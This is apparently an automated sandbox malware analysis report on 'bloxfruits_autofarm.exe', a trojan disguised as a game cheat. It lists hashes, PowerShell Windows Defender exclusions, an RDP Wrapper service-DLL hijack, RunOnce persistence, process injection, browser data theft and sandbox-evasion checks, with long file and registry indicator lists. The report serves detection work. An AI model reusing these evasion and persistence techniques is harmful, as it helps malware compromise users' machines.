Analysis
-
max time kernel
232s -
max time network
203s -
platform
windows11-21h2_x64 -
resource
win11-20240802-en -
resource tags
arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system -
submitted
06/10/2024, 12:04
Static task
static1
General
-
Target
bloxfruits_autofarm.exe
-
Size
335.7MB
-
MD5
fe78ddc645ae5dd5fc327097e82e8d14
-
SHA1
85fbef7ad9bdb10cf71c73100a0046f7adf23aec
-
SHA256
c72bf3713297c0d4ec59fdc74bc7e0eaa589be6cd02db11791f5de7fd7ee8bdf
-
SHA512
f03bb47f3199df8bf09bc880df61548b14cb89ac7602908d440e2fc7531e59c231054ba57350e5a5535023ac1d52140ca1089165eabc1e8f360a68042ae85e82
-
SSDEEP
6291456:o8Tj3P8iCyy1wWxvvMkx8xSkjnUTQIwH90Z0uRDF6gd6aEqaSVB:R3P8iLw1vvJKEyUMIq40cF1hERSD
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5088 powershell.exe 1572 powershell.exe -
Downloads MZ/PE file
-
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "C:\\Program Files\\RDP Wraper\\rdpwrap.dll" Commands.pif -
Executes dropped EXE 11 IoCs
pid Process 3532 697b3805-53cc-4dc2-95f8-214084ca33e7.exe 3088 Commands.pif 72 Commands.pif 3156 NDP481-DevPack-ENU.exe 3752 NDP481-DevPack-ENU.exe 4484 NDP481-DevPack-ENU.exe 488 NDP481-x86-x64-AllOS-ENU.exe 2388 Setup.exe 2984 SetupUtility.exe 944 SetupUtility.exe 2336 dismhost.exe -
Loads dropped DLL 26 IoCs
pid Process 3752 NDP481-DevPack-ENU.exe 2388 Setup.exe 2388 Setup.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe 2336 dismhost.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\{aa268773-4cc1-4c34-a3bd-80bb39857916} = "\"C:\\ProgramData\\Package Cache\\{aa268773-4cc1-4c34-a3bd-80bb39857916}\\NDP481-DevPack-ENU.exe\" /burn.runonce" NDP481-DevPack-ENU.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA NDP481-DevPack-ENU.exe -
Checks system information in the registry 2 TTPs 2 IoCs
System information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemManufacturer Setup.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SystemInformation\SystemProductName Setup.exe -
Drops file in System32 directory 15 IoCs
description ioc Process File opened for modification \??\c:\windows\syswow64\msvcr100_clr0400.dll Setup.exe File opened for modification \??\c:\windows\system32\msvcr120_clr0400.dll Setup.exe File opened for modification \??\c:\windows\system32\ucrtbase_clr0400.dll Setup.exe File opened for modification \??\c:\windows\system32\vcruntime140_clr0400.dll Setup.exe File opened for modification \??\c:\windows\system32\vcruntime140_1_clr0400.dll Setup.exe File opened for modification \??\c:\windows\system32\msvcr100_clr0400.dll Setup.exe File opened for modification \??\c:\windows\syswow64\msvcp140_clr0400.dll Setup.exe File opened for modification \??\c:\windows\system32\aspnet_counters.dll Setup.exe File opened for modification \??\c:\windows\system32\msvcp120_clr0400.dll Setup.exe File opened for modification \??\c:\windows\system32\msvcp140_clr0400.dll Setup.exe File opened for modification \??\c:\windows\syswow64\ucrtbase_clr0400.dll Setup.exe File opened for modification \??\c:\windows\syswow64\aspnet_counters.dll Setup.exe File opened for modification \??\c:\windows\syswow64\vcruntime140_clr0400.dll Setup.exe File opened for modification \??\c:\windows\syswow64\msvcp120_clr0400.dll Setup.exe File opened for modification \??\c:\windows\syswow64\msvcr120_clr0400.dll Setup.exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3656 tasklist.exe 1264 tasklist.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3088 set thread context of 72 3088 Commands.pif 95 -
resource yara_rule behavioral1/memory/72-111-0x0000000001620000-0x0000000001791000-memory.dmp upx behavioral1/memory/72-113-0x0000000001620000-0x0000000001791000-memory.dmp upx behavioral1/memory/72-114-0x0000000001620000-0x0000000001791000-memory.dmp upx behavioral1/memory/72-115-0x0000000001620000-0x0000000001791000-memory.dmp upx behavioral1/memory/72-173-0x0000000001620000-0x0000000001791000-memory.dmp upx behavioral1/memory/72-636-0x0000000001620000-0x0000000001791000-memory.dmp upx behavioral1/memory/72-642-0x0000000001620000-0x0000000001791000-memory.dmp upx behavioral1/memory/72-688-0x0000000001620000-0x0000000001791000-memory.dmp upx -
Drops file in Program Files directory 5 IoCs
description ioc Process File opened for modification C:\Program Files\RDP Wraper\ Commands.pif File opened for modification \??\c:\program files (x86)\microsoft.net\redistlist\assemblylist_4_extended.xml Setup.exe File opened for modification \??\c:\program files (x86)\microsoft.net\redistlist\assemblylist_4_client.xml Setup.exe File created C:\Program Files\RDP Wraper\rdpwrap.ini Commands.pif File opened for modification C:\Program Files\RDP Wraper\rdpwrap.dll Commands.pif -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\xpthemes.manifest Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\system.io.log.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\system.reflection.emit.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.security.cryptography.x509certificates\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.security.cryptography.x509certificates.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\config\browsers\iemobile.browser Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\config\web_mediumtrust.config.default Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\adonetdiag.mof Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\servicemodelevents.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_wow64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\normnfkc.nlp Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_wow64\presentationcore\v4.0_4.0.0.0__31bf3856ad364e35\globaluserinterface.compositefont Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\asp.netwebadminfiles\security\wizard\app_localresources\wizardproviderinfo.ascx.resx Setup.exe File opened for modification \??\c:\windows\inf\.net memory cache 4.0\netmemorycache.h Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\microsoft.build.engine.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\msbuild.exe.config Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\msbuild\v4.0_4.0.0.0__b03f5f7f11d50a3a\msbuild.exe Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\sql\en\sqlpersistenceservice_logic.sql Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\system.resources.resourcemanager.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\asp.netwebadminfiles\navigationbar.ascx Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\sbsnclperf.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\wpf\system.speech.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\csc.rsp Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\system.io.filesystem.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\installcommon.sql Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\wpf\globalserif.compositefont Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.runtime.compilerservices.visualc\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.runtime.compilerservices.visualc.dll Setup.exe File opened for modification \??\c:\windows\inf\msdtc bridge 4.0.0.0\0000\_transactionbridgeperfcounters_d.ini Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\config\machine.config Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\asp.netwebadminfiles\webadminhelp_security.aspx Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.diagnostics.tracing\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.diagnostics.tracing.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\mscorsvc.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\wpf\penimc.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\asp.netwebadminfiles\security\security.aspx Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\asp.netwebadminfiles\security\wizard\app_localresources\wizardadduser.ascx.resx Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\microsoft.csharp.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_wow64\system.web\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.web.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\wpf\uiautomationtypes.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\asp.netwebadminfiles\appconfig\app_localresources\defineerrorpage.aspx.resx Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\servicemonikersupport.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\mscordacwks.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\microsoft.workflow.compiler.exe.config Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\adonetdiag.mof Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\dfdll.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\system.collections.concurrent.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_wow64\presentationcore\v4.0_4.0.0.0__31bf3856ad364e35\globalserif.compositefont Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\system.io.compression.filesystem.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\asp.netwebadminfiles\appconfig\app_localresources\debugandtrace.aspx.resx Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\asp.netwebadminfiles\webadminhelp_internals.aspx Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\presentationcore\v4.0_4.0.0.0__31bf3856ad364e35\globaluserinterface.compositefont Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\wpf\system.windows.input.manipulations.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.activities.core.presentation\v4.0_4.0.0.0__31bf3856ad364e35\system.activities.core.presentation.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\assembly\gac_64\system.data.common\v4.0_4.0.0.0__b03f5f7f11d50a3a\system.data.common.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\tlbref.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\datasvcutil.exe.config Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\asp.netwebadminfiles\security\setupauthentication.aspx Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\system.io.unmanagedmemorystream.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\asp.netwebadminfiles\security\wizard\wizardauthentication.ascx Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\cvtres.exe Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\wpf\fonts\globalmonospace.compositefont Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\asp.netwebadminfiles\appconfig\appconfighome.aspx Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\asp.netwebadminfiles\security\wizard\app_localresources\wizard.aspx.resx Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework64\v4.0.30319\config\machine.config.default Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\wpf\presentationframework-systemxml.dll Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\asp.netwebadminfiles\webadminwithconfirmation.master Setup.exe File opened for modification \??\c:\windows\microsoft.net\framework\v4.0.30319\asp.netwebadminfiles\home2.aspx Setup.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 22 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NDP481-x86-x64-AllOS-ENU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Commands.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Commands.pif Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bloxfruits_autofarm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 697b3805-53cc-4dc2-95f8-214084ca33e7.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NDP481-DevPack-ENU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NDP481-DevPack-ENU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SetupUtility.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NDP481-DevPack-ENU.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language SetupUtility.exe -
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\PartitionTableCache = 00000000040000006fd7ccd00b9e209d0000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000c01200000000ffffffff0000000027010100000800006fd7ccd00000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000d01200000000000020ed3a000000ffffffff0000000007000100006809006fd7ccd0000000000000d012000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0ff3a0000000000000005000000ffffffff000000000700010000f87f1d6fd7ccd0000000000000f0ff3a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff0000000000000000000000006fd7ccd000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 vssvc.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Setup.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Commands.pif Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Commands.pif -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Setup.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 4968 systeminfo.exe -
Modifies data under HKEY_USERS 56 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "85" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe -
Modifies registry class 9 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\{aa268773-4cc1-4c34-a3bd-80bb39857916}\ = "{aa268773-4cc1-4c34-a3bd-80bb39857916}" NDP481-DevPack-ENU.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\{aa268773-4cc1-4c34-a3bd-80bb39857916}\DisplayName = "Microsoft .NET Framework 4.8.1 Developer Pack" NDP481-DevPack-ENU.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\{aa268773-4cc1-4c34-a3bd-80bb39857916}\Dependents NDP481-DevPack-ENU.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\{aa268773-4cc1-4c34-a3bd-80bb39857916}\Dependents\{aa268773-4cc1-4c34-a3bd-80bb39857916} NDP481-DevPack-ENU.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\{aa268773-4cc1-4c34-a3bd-80bb39857916} NDP481-DevPack-ENU.exe Key created \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\{aa268773-4cc1-4c34-a3bd-80bb39857916} NDP481-DevPack-ENU.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\{aa268773-4cc1-4c34-a3bd-80bb39857916}\Version = "4.8.9195.10" NDP481-DevPack-ENU.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\{aa268773-4cc1-4c34-a3bd-80bb39857916}\Dependents\{aa268773-4cc1-4c34-a3bd-80bb39857916} NDP481-DevPack-ENU.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\{aa268773-4cc1-4c34-a3bd-80bb39857916}\Dependents NDP481-DevPack-ENU.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8F43288AD272F3103B6FB1428485EA3014C0BCFE Setup.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\8F43288AD272F3103B6FB1428485EA3014C0BCFE\Blob = 5900000001000000160000005200530041002f005300480041003200350036000000190000000100000010000000bb048f1838395f6fc3a1f3d2b7e97654140000000100000014000000722d3a02319043b914054ee1eaa7c731d12389340300000001000000140000008f43288ad272f3103b6fb1428485ea3014c0bcfe69000000010000000e000000300c060a2b0601040182373c03020b00000001000000540000004d006900630072006f0073006f0066007400200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079002000320030003100310000000f0000000100000020000000279cd652c4e252bfbe5217ac722205d7729ba409148cfa9e6d9e5b1cb94eaff1040000000100000010000000ce0490d5e56c34a5ae0be98be581185d5c0000000100000004000000001000002000000001000000f1050000308205ed308203d5a00302010202103f8bc8b5fc9fb29643b569d66c42e144300d06092a864886f70d01010b0500308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f726974792032303131301e170d3131303332323232303532385a170d3336303332323232313330345a308188310b3009060355040613025553311330110603550408130a57617368696e67746f6e3110300e060355040713075265646d6f6e64311e301c060355040a13154d6963726f736f667420436f72706f726174696f6e31323030060355040313294d6963726f736f667420526f6f7420436572746966696361746520417574686f72697479203230313130820222300d06092a864886f70d01010105000382020f003082020a0282020100b28041aa35384d13723268224db8b2f1ffd552bc6cc7f5d24a8c36eed1c25c7e8c8aaeaf13286fc073